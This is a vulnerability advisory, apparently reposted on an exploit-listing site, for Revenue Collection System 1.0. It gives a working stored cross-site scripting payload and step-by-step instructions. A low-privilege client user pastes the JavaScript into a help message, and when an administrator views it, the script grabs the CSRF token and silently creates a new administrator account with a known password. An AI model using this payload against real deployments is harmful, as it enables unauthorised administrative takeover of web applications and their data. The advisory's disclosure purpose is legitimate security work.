Revenue Collection System 1.0 Cross Site Scripting / Authentication Bypass

2022.11.17
Credit: Joe Pollock
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS # Exploit Author: Joe Pollock # Date: November 16, 2022 # Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip # Tested on: Kali Linux, Apache, Mysql # CVE: T.B.C # Vendor: Kapiya # Version: 1.0 # Exploit Description: # Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated # client user to add an administrative user account to the application then log in as the newly created admin. To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help). The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the 'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the 'target', 'x_Username', and 'x_Passsword' as required). <script> var target = "http://localhost/rates/admin/usersadd.php"; var req = new XMLHttpRequest(); req.open("GET", target); req.send(); var parser = new DOMParser(); resp = req.responseText var document = parser.parseFromString(resp, "text/html"); var token = document.getElementsByName("token")[0].value; var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1"; req.open("POST", target); req.withCredentials = true; req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); req.send(params); </script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top